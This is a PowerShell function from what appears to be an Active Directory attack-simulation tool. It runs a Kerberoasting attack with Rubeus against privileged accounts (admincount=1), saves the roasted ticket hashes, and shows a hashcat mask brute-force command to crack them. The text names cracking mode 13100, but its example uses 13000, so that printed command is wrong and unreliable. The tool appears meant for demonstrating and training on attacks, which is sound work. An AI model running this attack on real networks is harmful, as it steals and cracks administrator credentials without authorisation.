AS2Go

2026.3.17.1034

Private/Start-KerberoastingAttack.ps1

                                function Start-KerberoastingAttack {

    ################################################################################

    ######                                                                     #####

    ######                Kerberoasting Attack                                 #####

    ######                                                                     ##### 

    ######     technique used by attackers, which allows them to request       #####

    ######     a service ticket for any service with a registered SPN          #####

    ######                                                                     #####

    ################################################################################

    $CurrentFunction = Get-FunctionName

    Write-Log -Message "### Start Function $CurrentFunction ###"

    $StartRunTime = (Get-Date).ToString($Script:DateFormatLog)

    #################### main code | out- host #####################

    $myDomain = $env:USERDNSDOMAIN

    $hashes = "KR-$myDomain.hashes.txt"

    # example: .\Rubeus.exe kerberoast /domain:SANDBOX.CORP /outfile:.\SANDBOX.CORP.hashes.txt

    Write-Host      -NoNewline "  Command: "

    Write-Highlight -Text ".\Rubeus.exe ", "kerberoast ", "/domain:", "$myDomain", " /outfile:.\", "$hashes" `

        -Color $fgcC, $fgcF, $fgcS, $fgcV, $fgcS, $fgcV

    If ($UnAttended) {

        $answer = $No 

    }

    else {

        $question = "Would you like to run this step - Y or N? Default "

        $answer = Get-Answer -question $question -defaultValue $No

    }

    If ($answer -eq $yes) {

        if (Test-Path $hashes) {Remove-Item $hashes}

        Invoke-Command -ScriptBlock {

            param($rubeusPath, $domain, $outfile)

            & $rubeusPath kerberoast /ldapfilter:'admincount=1' /domain:$domain /outfile:$outfile

        } -ArgumentList $($Script:RUBEUS), $myDomain, $hashes

        Invoke-Item .\$hashes

        If ($UnAttended) { Start-Sleep 2 } else { Pause }

        #https://medium.com/geekculture/hashcat-cheat-sheet-511ce5dd7857

        Write-Host "`n"

        write-host "The next step is " -NoNewline; write-host "cracking" -NoNewline -ForegroundColor $fgcH 

        Write-host " the roasted hashes. HASHCAT is a good tool." 

        Write-host "Let’s use the example where you know the password policy for the password;" 

        Write-host "Known as Brute-force or mask attack."

        Write-Host "The cracking mode for TGS-REP hashes is 13100.`n"

        # example: .\hashcat.exe -a 3 -m 13000 ./SANDBOX.CORP.hashes.txt ?u?l?l?l?l?l?d?d

        Write-Host      -NoNewline "  Example: "

        Write-Highlight -Text ".\hashcat.exe ", "-a ", "3", " -m ", "13000 ", "./$hashes ", "?u?l?l?l?l?l?d?d" `

            -Color $fgcC, $fgcS, $fgcV, $fgcS, $fgcV, $fgcV, $fgcF

        Write-Host "`n"

        If ($UnAttended) { Start-Sleep 2 } else { Pause }

    }

    Write-Log -Message "     >> Run .\$Script:RUBEUS kerberoast /domain:$myDomain /outfile:.\$hashes"

    ######################## main code ############################

    $runtime = Get-RunTime -StartRunTime $StartRunTime

    Write-Log -Message "    Run Time: $runtime [h] ###"

    Write-Log -Message "### End Function $CurrentFunction ###"

}